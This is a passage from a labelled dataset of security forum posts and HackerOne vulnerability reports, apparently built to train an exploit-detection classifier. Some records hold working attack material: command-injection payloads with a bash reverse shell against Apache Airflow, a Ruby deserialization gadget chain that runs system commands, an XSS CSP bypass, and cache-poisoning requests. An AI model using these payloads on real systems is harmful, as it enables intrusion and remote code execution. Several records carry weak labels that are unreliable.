https://github.com/electron/electron/security/advisories/GHSA-mq8j-3h7h-p8g7\n\n## Impact\n\nUsing a renderer exploit, context isolation and nodeIntegrationInSubFrames can be disabled, which enables an attacker to leak IPC module and communicate with the more privileged main process which might eventually lead to Remote Code Execution if there are sensitive IPC handlers on main process.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b99cade015d32d2b443", "text": "[Cross-site Scripting (XSS) - DOM] Cross Site Scripting Vulnerability in fabric-sdk-py source code\n\nSee this fix on GitHub \nhttps://github.com/hyperledger/fabric-sdk-py/pull/175\n\n## Impact\n\nSome old affected versions of this package are vulnerable to Cross-site Scripting (XSS). Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c746e53ca24586afc88f", "text": "[Information Disclosure] Tor IP leak caused by the PDF Viewer extension in certain situations\n\n## Summary:\nWeb requests made by browser extensions in the Tor profile aren't proxied if the user didn't load any HTTP/HTTPS website in a Tor window since the browser first launched.\n\nThis wouldn't really be a problem because extensions can't be used in Tor windows. However, Brave has some built-in extensions (Brave, Brave Rewards, Brave WebTorrent, PDF viewer) that also run in Tor mode. This last one can cause problems.\n\nIf:\n- The user didn't visit any HTTP/HTTPS page with Tor in that browser session.\n- The user goes to `chrome-extension://oemmndcbldboiebfnladdacbdfmadadm/pdf-url` in a Tor window.\n\nThen the server hosting `pdf-url` will get the real IP address of the user, even tho the PDF was loaded in a Tor window.\n\nThis happens because the PDF viewer extension requests the PDF as an AJAX request, and as mentioned before, requests aren't proxied until an HTTP/HTTPS address is loaded with the address bar in a Tor window (or you \"duckduckgo\" something).\n\n## Products affected: \nThis was tested in the most recent versions of Brave Stable & Dev, in a Windows 10 PC.\nStable: 0.65.118 Chromium: 75.0.3770.80 (Official Build) (64-bit) \nDev: 0.67.77 Chromium: 75.0.3770.80 (Official Build) dev (64-bit)\n\n## Steps To Reproduce:\n1. Close Brave normally.\n2. Make sure Brave is actually closed (if the Brave icon is in the Windows toolbar, right click it and press exit. You can also use task manager to kill the processes).\n3. Open Brave again.\n4. Open a Tor window. Don't open any website in the Tor window before step 5.\n5. Go to this URL: `chrome-extension://oemmndcbldboiebfnladdacbdfmadadm/http://ip-pdf.glitch.me/ `. The request to glitch.me won't be proxied with Tor - you'll see the PDF returned by it will include your real IP address.\n6. (optional) Load a website in the Tor window as a new tab (e.g. duckduckgo.com).\n7. (optional) Refresh the PDF. You'll see the request to get the PDF is now proxied, because an HTTP website has been loaded.\n\n## Supporting Material/References:\n\nNode JS server for ip-pdf (source): https://glitch.com/~ip-pdf\n\n## Impact\n\nAll HTTP/HTTPS requests, AJAX or not, are supposed to be proxied in Tor windows. This doesn't happen in this situation, leading to an IP leak.\nHowever, the severity isn't high because certain conditions must be met for this to happen.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2aae013f8979878b6203", "text": "Relwarc17: https://www.hackthebox.eu/home/users/profile/42767 I didn’t know the path to my profile (when i opened profile the path didn’t show up in the URL bar, i knew only my number) Thank you, i gave you respect for this.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5351a2a397167f405d21", "text": "[Improper Access Control - Generic] Deprecated owners.query API bypasses object view policy\n\nThe deprecated owners.query API does not check object view policy. A user is able to view some information about an owner package which they do not have permission to see by calling this API. Since the API is deprecated, it could just be removed.\n\n## Impact\n\nAn attacker is able to view some information about an owner package that they should not be able to see. Including, name, description, owner PHIDs, and repository PHIDs, and a path (which may be a path that belongs to a restricted repository).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "48f9e12f617b04e2bf1c", "text": "What should I do with links in comments on my site?\n\nWe have the same problem here... We are able to make any post with a link go into a pre-mod que for review on NEW Members.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "antionline", "timestamp": "2022-05-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4fea7d196c221e933251", "text": "What is best way to deploy Sharphound-Bloodhound in multiple forest environments using one-way trusts?\n\nVery new to bloodhound/sharphound and have this deployment question: what is the best way to deploy bloodhound and sharphound to maximize info collection and also minimize deployment complexity in multiple forest/multiple domain AD environments built using one-way trusts between the forests. There are 9 forests involved configured in an “environment”/“security enclave” design construct where the environments have a protection scheme relationship of most trusted, next trusted, least trusted and then within each of these 3 “environments” the “security enclaves” (which are also forests) have a similar construct of most trusted to next trusted to least trusted. So e.g. if Sharphound were deployed in the most trusted environment forest and that environment’s most trusted enclave, is there a way for that Sharphound to see everything across all the 9 forests?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2023-01-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "91c989e5f4152febf374", "text": "[Improper Access Control - Generic] Improper Access Control on Media Wiki allows an attackers to restart installation on DoD asset\n\nHello,\n\nI notice that is possible to restart installation on this media wiki website due to the fact that /mw-config/index.php is available without authentication\n\nPoc:\nhttps://█████████/mw-config/index.php\n\nRegards\n\n## Impact\n\nAttackers can restart the application.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nGo directly to https://██████████/mw-config/index.php and you should see the restart installation button.\n\n## Suggested Mitigation/Remediation Actions\nBlock all access to your mw-config folder.\n\nWe fixed this by adding:\n\nRedirectMatch 404 /\\mw-config", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c7aec12fbdf94b2a1fc0", "text": "[Cross-site Scripting (XSS) - Stored] Stored xss at https://█.8x8.com/api/█/ID\n\n## Summary:\nhey , \ni found a stored xss at `https://██████.8x8.com/api/██████mentInfoById/ID` , when i analysis javascript code i understand user can modify her ip address with endpoint `https://███.8x8.com/api/patchPaymentMethod/ID` , next point i understand when we open `https://████████.8x8.com/api/██████████mentInfoById/ID` server set `Content-Type: text/html;charset=UTF-8` , this was interesting point , then i modify ip address with this request:\n```\nPOST /api/patchPaymentMethod/█████████ HTTP/2\nHost: ███.8x8.com\nCookie: ajs_anonymous_id=13b1ab4c-87f5-4dbb-967b-066b6d7efd1e; _gcl_au=1.1.275521026.1689699475; _fbp=fb.1.1689701587161.1730712436; __cf_bm=MloB4oUJmeviUXpE1GRUn8TtqbE4CwVEttuZr9tUrOQ-1689845706-0-AWJDz0q9F1c0CmKcbShEYyS7Qqsfd88Gb9W9YsIXUoHhnP/aHA+wGRccAnb8GxD1HBTGXJ71aHh7XzOojjLP/sg=\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nTe: trailers\nContent-Type: application/json\nContent-Length: 112\n\n{\n \"ipAddress\": \"\",\n\"callBackURL\":\"dssdsd\"\n }\n```\nnow i get response : \n```\nHTTP/2 400 Bad Request\nDate: Thu, 20 Jul 2023 23:30:32 GMT\nContent-Length: 0\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\nExpires: 0\nPragma: no-cache\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains\nX-Content-Type-Options: nosniff\nX-Frame-Options: DENY\nX-Gk-Traceid: e97be98a-d5e6-4fce-a6a5-4d5f6d28b02a\nX-Regional-Id: usw2-gk-65dc71e19a79\nX-Served-Epoch: 1689895832189\nX-Xss-Protection: 1; mode=block\nCf-Cache-Status: DYNAMIC\nSet-Cookie: __cf_bm=7dklJH6I0nIayzUSs2ga_6bhxG_AZTclwDwaUIaKeBQ-1689895832-0-AQvIhwqEdRP3rLeIkHe1u4gqwspbam+/6s7/WEIOEsrvvvpuOSaaBNi36GsWEVNOGQWbRBz4Z89eCgjOTdOWGv0=; path=/; expires=Fri, 21-Jul-23 00:00:32 GMT; domain=.8x8.com; HttpOnly; Secure; SameSite=None\nServer: cloudflare\nCf-Ray: 7e9efe156adf41f9-EWR\n\n\n```\n\nthen i check url : https://█████████.8x8.com/api/██████████mentInfoById/████ \nand i seen ip address updated and █████load successfully executed : \n█████████\n \n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. open url : https://███.8x8.com/api/████mentInfoById/█████ \n 1. you can see my injected ████████load executed :D \n\n## Supporting Material/References:\n███\n\n## Impact\n\nStealing cookies and executed javascript in victim browser", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "94f3f29fa3fd208e2d0f", "text": "[Unknown] [Java] CWE-016: Query to detect insecure configuration of Spring Boot Actuator\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "59943769bd1bde22913d", "text": "For web app security I recommend Portswigger Academy; its got a lot of writeups for everything from SQL injections to business logic errors and has several labs for each topic - all completely free.For Linux/binary exploitation practice I got started with Exploit Education, really well made labs that you run as a virtual machine. They teach you about basic lower-level exploitation techniques (for Linux) in increasing difficulty, like SUID, race conditions, and buffer overflows. The Nebula box is the “easier” one, then you can move on to Phoenix for more of a challenge.And it’s fairly well known but my go-to for general infosec information is the online HackTricks book, it’s a great place to start when learning about a specific topic.For python I’d recommend just sticking to one course or book, a comprehensive free resource I used in the past is this one by ForrestKnight that sort of compiles together a bunch of free courses in one place so you can pick and choose.I hope it helps! And good luck", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7d468677bb8458f7c72b", "text": "[Unknown] cpp: if (a+b>c) a=c-b is incorrect if a+b overflows\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "978762886e8d85ac423c", "text": "Hey! can you give me a hint for finding the employee name? Cant find it. look at conversations, used ctr+F to filter by string Credent, auth, user or name as the packet details and nothing.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f363cb853ec906e5e606", "text": "[Violation of Secure Design Principles] Suspicious login app ships old league/flysystem version\n\n## Summary:\nThe vulnerability allows a remote attacker to compromise vulnerable system.\nThe vulnerability exists due to a race condition. A remote attacker can send a specially crafted request and execute arbitrary code on the target system.\n`Flysystem: 0.1.0 - 2.1.0`\n\n\nhttps://github.com/nextcloud/suspicious_login/\n```php\nremoveFunkyWhiteSpace($path);\n $this->rejectFunkyWhiteSpace($path);\n```\n\n**Supporting References:**\nThe unicode whitespace removal has been replaced with a rejection (exception).\nThe library has been patched in:\n * [1.x: thephpleague/flysystem@f3ad691](https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32)\n * [2.x: thephpleague/flysystem@a3c694d](https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74)\n\n**CVE-2021-32708**\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n[GHSA-9f46-5r25-5wfm](https://github.com/thephpleague/flysystem/security/advisories/GHSA-9f46-5r25-5wfm)\n\n## Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions:\n * A user is allowed to supply the path or filename of an uploaded file.\n * The supplied path or filename is not checked against unicode chars.\n * The supplied pathname checked against an extension deny-list, not an allow-list.\n * The supplied path or filename contains a unicode whitespace char in the extension.\n * The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2021-32708"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5760708c0f52fdad61e6", "text": "[Cross-site Scripting (XSS) - Reflected] RXSS ON https://██████████\n\n**Description:**\nCross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.\n\nAn attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site\n\n## References\n\n## Impact\n\nXSS can have huge implications for a web application and its users. User accounts can be hijacked, credentials could be stolen, sensitive data could be exfiltrated, and lastly, access to your client computers can be obtained\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1)Paste the payload and you will get a popup https://███/███=%3Cscript%3Ealert(document.domain)%3C/script%3E█████\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d7edfd23f333d782dcb2", "text": "[Command Injection - Generic] CVE-2022-24288: Apache Airflow: TWO RCEs in example DAGs\n\nIn Apache Airflow, prior to version 2.2.4, In DAG script of airflow , there is two command injection vulnerability (RCE) in the some scripts, which an attacker can execute arbitrary commands on the system. The impact is even greater when airflow is configured for unauthenticated access. These two RCEs are assigned the same CVE number(CVE-2022-24288)\n\n## Impact\n\n#RCE one: example_passing_params_via_test_command.py command injection\n\n##Vulnerability summary:\nIn Apache Airflow, prior to version 2.2.4, there is a command injection vulnerability (RCE) in the script (example_passing_params_via_test_command.py), which can obtain the permission of the operating system. \n##Vulnerability principle:\n1. It can be seen from the source code of example_passing_params_via_test_command script that there is the function of executing bash command, The parameters Foo and MIFF in the template expressions {{params. Foo}} and {{params. Foo}} are externally controllable and rendered through the jiaja2 template: \n\n{F1634883}\n\n{F1634884}\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1634885}\n\n##Vulnerability exploitation :\n1. Enter the DAGs menu and start example_passing_params_via_test_command task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=example_passing_params_via_test_command\n\n{F1634887}\n2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).\n\n{F1634888}\nPAYLOAD:`{\"foo\":\"\\\";touch /tmp/pwnedaaaaa;\\\"\"}`, Then click trigger to execute the task.\n\n{F1634889}\n\n{F1634890}\nThrough the log and background view, it can be seen that any command has been executed successfully.\n\n{F1634891}\n\n{F1634892}\n3. Further execute the reverse shell to obtain operating system permissions.\nPayload:` {\"foo\":\"\\\";bash -i >& /dev/tcp/192.168.3.7/6666 0>&1;\\\"\"}`\n\n{F1634893}\n\n{F1634894}\n\n#RCE two: tutorial.py DAG command injection\n\n##Vulnerability summary:\nIthere is a command injection vulnerability (RCE) in the script (tutorial.py), which an attacker can execute arbitrary commands on the system. \n##Vulnerability principle:\n1. It can be seen from the source code of tutorial script that there is the function of executing bash command, The parameters “my_param” in the template expressions {{params.my_param}} is externally controllable and rendered through the jinja2 template: \n\n{F1634906}\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1634907}\n#Vulnerability exploitation:\n1. Enter the DAGs menu and start tutorial task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=tutorial\n\n{F1634908}\n2. To construct payload, we can know from the following code that we need to splice commands with semicolons after closing double quotation marks, so as to inject any operating system commands to be executed(RCE).\n\n{F1634913}\nPAYLOAD:`{\"my_param\":\"\\\";touch /tmp/pwnedddddd;\\\"\"}`, Then click trigger to execute the task.\n\n{F1634915}\n\n{F1634916}\nThrough the log and background view, it can be seen that arbitrary command has been executed successfully.\n\n{F1634917}", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-24288"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5962625ba002a6daf113", "text": "[Cross-site Scripting (XSS) - Stored] Cache Poisoning allows redirection on JS files\n\nHi,\n\nI found the following Cache Poisoning vulnerability:\n\n1. Send the following request: ( this will poison `/test.js` into redirecting to `https://youst.in/test.js`) \n\n```http\nGET /test.js?cb=1 HTTP/2\nHost: design.glassdoor.com\nSec-Ch-Ua: \"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nSec-Ch-Ua-Platform: \"macOS\"\nAccept: text/css,*/*;q=0.1\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: no-cors\nSec-Fetch-Dest: style\nReferer: https://design.glassdoor.com/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nX-Forwarded-Scheme: http\nX-Forwarded-Host: youst.in\n\n```\n\n2. You should notice the `Cf-Cache-Status: MISS` header when first sending the request. After sending another request, you should see `Cf-Cache-Status: HIT`, confirming the redirect has been cached.\n\n3. You can also visit the url in a browser and notice you get redirect to `youst.in`.\n\n## Impact\n\nAn attacker can use the same attack against valid JS files leading to full control over the loaded JS. If any Glassdoor websites import javascript files from `https://design.glassdoor.com/*` they are susceptible to a Stored XSS attack via Cache Poisoning.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2685969c564f5485b6ce", "text": "[Improper Access Control - Generic] Banned user still able to invited to reports as a collabrator and reset the password\n\n#Description:\n\n* The permanently banned user account can't access any account features or reports and when accessing his profile he receives 404 not found so the account seems to be not signed or not found so the permanently banned user account must be can not access any HackerOne/account features anymore or access reports, but I was able to add the permanently banned user as a collaborator In the report and reset the password without any restrictions\n\n##Steps to reproduce:\n\n* I created an account and send a message to the support team to permanently ban the user account \n\n* After the account was banned I created a new test account and sandbox program \n\n* I send a collaborator request to the banned account so he must be can't receive the collaborator email\n\n* But he invited to the report as shown below:\n\n{F2309760}\n\n* Also I can send and reset the password\n\n{F2309761}\n\n{F2309769}\n\n* Here I reset the password\n\n{F2309773}\n\n* Now the banned user is able to join reports as a collaborator and reset his password and this restricted to banned user\n\n## Impact\n\nThe banned user able to join reports as a collaborator and reset his password this Is restricted due to be permanently banned from the platform and must be can't access any data or use any feature from the HackerOne platform because his account Is seems to be deleted from the platform and must be can't access anything from his account or access any data", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4da535957ae4dd754b8b", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS in Notes (with CSP bypass for gitlab.com)\n\n## Summary\nI read the issue [345657](https://gitlab.com/gitlab-org/gitlab/-/issues/345657) which handles the XSS in notes reported in Hackerone report [1398305](https://hackerone.com/reports/1398305). This issue fixes the reported XSS but leaves the HTML injection that was also mentioned. I don't know how you deal with these situations, but I thought I report this, and you can decide :)\n\nThe issue linked above shows how a user can inject HTML in any Note (actually any Markdown it seems. For example wiki pages and issue descriptions) by abusing [syntax_highlight_filter.rb](https://gitlab.com/gitlab-org/gitlab/-/blob/c2e5d7b89b84cc5b44575592bb706ef75c3d1bbb/lib/banzai/filter/syntax_highlight_filter.rb).\n\nThere are more ways to take this injection and weaponize it than the patched Emoji tag. I have a list of additional vectors but though that I would report the worst one (proper full stored XSS) and explain more if you decide to accept the report. To not waste our time.\n\nI have multiple ways to inject `script` tags, but it looks like you have hardened your CSP? None of the old bypasses worked for me. But it still seems that you have not blocked the `base` tag. And fortunately for me, the injection let me pass in `base` tags. So by entering this into an issue description or wiki page\n\n```\n
\n\n
\n
\n```\nAll relative links in the page will try to load their data from my site \"joaxar.com\". If we then open DevTools and reload the page, we will see the name of all files that failed to load. In the case of an issue page, we have this script\n```\nhttp://joaxcar.com/assets/webpack/hello.4948f350.chunk.js\n```\nand for a wiki page we have\n```\nhttps://joaxcar.com/assets/webpack/top_nav.c9763726.chunk.js\n```\n{F1618905}\n\nNow I just have to create these files on my domain, and they will load and bypass CSP (as these script tags will have nonce in place and can thus load anything)\n\n{F1618900}\n\n## Steps to reproduce\n1. log in as a user on Gitlab.com\n2. go to any project (or create one), and add a new issue\n3. enter this as the description (replace with your own server if you need to generate new scripts on your own domain)\n```\n
\n\n
\n
\n```\n4. save the issue\n5. open DevTools (f12) and look for failing script imports\n6. create the missing script on your domain containing\n```\nalert(document.domain)\n```\n7. reload the page and the popup should pop\n\n{F1618901}\n\n\n### Impact\n\nStored XSS in gitlab.com\n\nThere are more that can be added to the report but I am sending this in first and will add information later. The XSS can as you know create tokens (and as I have shown before take over SSO accounts)\n\n### What is the current *bug* behavior?\n\nHTML injection in Markdown\n\n### What is the expected *correct* behavior?\n\nShould not be possible\n\n### Output of checks\n\nThis bug happens on GitLab.com\n\n## Impact\n\nStored XSS in gitlab.com\n\nThere are more that can be added to the report but I am sending this in first and will add information later. The XSS can as you know create tokens (and as I have shown before take over SSO accounts)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e1086983755f27eb7c10", "text": "[Deserialization of Untrusted Data] XMLRPC does not limit deserializable classes.\n\nI confirmed that the classes that can be generated by parsing the xml sent in the request or response by XMLRPC bundled in ruby are not restricted.\n\nhttps://github.com/ruby/xmlrpc/blob/v0.3.2/lib/xmlrpc/create.rb#L251\n\n```ruby\n if Config::ENABLE_MARSHALLING and param.class.included_modules.include? XMLRPC::Marshallable\n # convert Ruby object into Hash\n ret = {\"___class___\" => param.class.name}\n param.instance_variables.each {|v|\n```\n\nWhen converting parameters to XML, limited to those that include `XMLRPC::Marshallable`.\n\nhttps://github.com/ruby/xmlrpc/blob/v0.3.2/lib/xmlrpc/parser.rb#L104\n\n```ruby\n# Converts the given +hash+ to a marshalled object.\n#\n# Returns the given +hash+ if an exception occurs.\ndef self.struct(hash)\n # convert to marshalled object\n klass = hash[\"___class___\"]\n if klass.nil? or Config::ENABLE_MARSHALLING == false\n hash\n else\n begin\n mod = Module\n klass.split(\"::\").each {|const| mod = mod.const_get(const.strip)}\n\n obj = mod.allocate\n\n hash.delete \"___class___\"\n hash.each {|key, value|\n obj.instance_variable_set(\"@#{ key }\", value) if key =~ /^([a-zA-Z_]\\w*)$/\n }\n obj\n rescue\n hash\n end\n end\nend\n```\nHowever, there are no class restrictions when parsing.\n\nhttps://github.com/ruby/xmlrpc/blob/v0.3.2/lib/xmlrpc/config.rb#L27\n\n```ruby\n # enable marshalling Ruby objects which include XMLRPC::Marshallable\n ENABLE_MARSHALLING = true\n```\n\n`Config::ENABLE_MARSHALLING` is true by default so there is no limit to the classes that can be restored.\n\n---\n\n## PoC\n\n### Prepare\n\ncreate `build_xml.rb`\n\n```ruby\nrequire \"xmlrpc/marshal\"\n\n# Universal Deserialisation Gadget for Ruby 2.x-3.x\n# https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html\n\n# Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# Because the classes that can be dumped are limited\nclass Array\n def include?(_)\n true\n end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"date\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\ncreater = XMLRPC::Create.new\ncall_xml = creater.methodCall(\"for_call\", r)\nFile.write('attack_call.xml', call_xml)\n\nresponse_xml = creater.methodResponse(\"for_response\", r)\nFile.write('attack_response.xml', response_xml)\n```\n\n```\n$ cat Gemfile\n# frozen_string_literal: true\n\nsource \"https://rubygems.org\"\n\ngem 'xmlrpc', '~> 0.3.2'\ngem 'webrick', '~> 1.7'\ngem 'rack', '~> 2.2', '>= 2.2.3'\n\n$ bundle install\n...\n\n$ bundle exec ruby build_xml.rb\n# create attack_call.xml and attack_response.xml\n```\n\n\n### PoC for server attack\n\n```ruby\n# craft_client.rb\nrequire \"xmlrpc/client\"\n\nserver = XMLRPC::Client.new(\"localhost\", \"/RPC2\", 8080)\ncraft = File.read(\"./attack_call.xml\")\nok, param = server.send(:do_rpc, craft)\n\n\nif ok then\n puts \"param: #{param}\"\nelse\n puts \"Error:\"\n puts param.faultCode\n puts param.faultString\nend\n```\n\n```ruby\n# xmlrpc_server.rb\n\nrequire \"webrick\"\nrequire \"xmlrpc/server\"\n\n# required classes\nrequire 'net/http'\nGem::Installer\n\ns = XMLRPC::WEBrickServlet.new\n\ns.add_handler(\"for_call\") do |param|\n param.to_s\nend\n\nhttpserver = WEBrick::HTTPServer.new(:Port => 8080)\nhttpserver.mount(\"/RPC2\", s)\ntrap(:INT){httpserver.shutdown}\nhttpserver.start\n```\n\n\n```\n❯ bundle exec ruby craft_client.rb\nparam:\n\n```\n\n```\n❯ bundle exec ruby xmlrpc_server.rb\n[2021-05-09 20:49:35] INFO WEBrick 1.7.0\n[2021-05-09 20:49:35] INFO ruby 2.7.1 (2020-03-31) [x86_64-darwin19]\n[2021-05-09 20:49:35] INFO WEBrick::HTTPServer#start: pid=48443 port=8080\nsh: reading: command", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4606c7eec9365a8727f2", "text": "[Cross-site Scripting (XSS) - Generic] Universal XSS through FIDO U2F register from subframe\n\n## Summary:\n\nThere are three weaknesses in Brave's FIDO U2F implementation.\n\n* `u2f.register()` can be executed from cross-origin subframe by invoking [U2F.postMessage](https://github.com/brave/brave-ios/blob/e52c52495aa654584abe8172d689977756e6549d/Client/Frontend/UserContent/UserScripts/U2F.js#L264) directly\n* Then, FIDO related modals show the name of top frame origin (but not caller subframe)\n* The `version` parameter sent from the above `postMessage` is embedded in an [evaluateJavaScript](https://github.com/brave/brave-ios/blob/d01b8c07b8a6244af48798efe4afeccd266707e2/Client/WebAuthN/U2FExtensions.swift#L1003) without escape\n\nThe combination of these weaknesses allows cross-domain subframe to inject any JavaScript code to the top frame through fake U2F registration process.\n## Products affected: \n\n * Brave iOS Version 1.20 (20.09.11.20), also current Nightly\n\n## Steps To Reproduce:\n\n* Open [UXSS Victim](https://alice.csrf.jp/brave/uxss_victim.php) hosted on alice.csrf.jp.\n This site has a cross-origin iframe that opens evil.csrf.jp.\n* Ready to Scan dialog is shown with the name of top frame\n* Insert your FIDO device such as YubiKey 5Ci and touch\n* Injected JavaScript `alert()` is executed on the top frame\n\n## Supporting Material/References:\n\n * See attached movie file for the demonstration\n\n## Impact\n\nAs written in summary, malicious web content in subframe can UXSS on the top frame origin.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c55cee3196cc83a2d04", "text": "[Cross-Site Request Forgery (CSRF)] Account takeover due to insufficient URL validation on RelayState 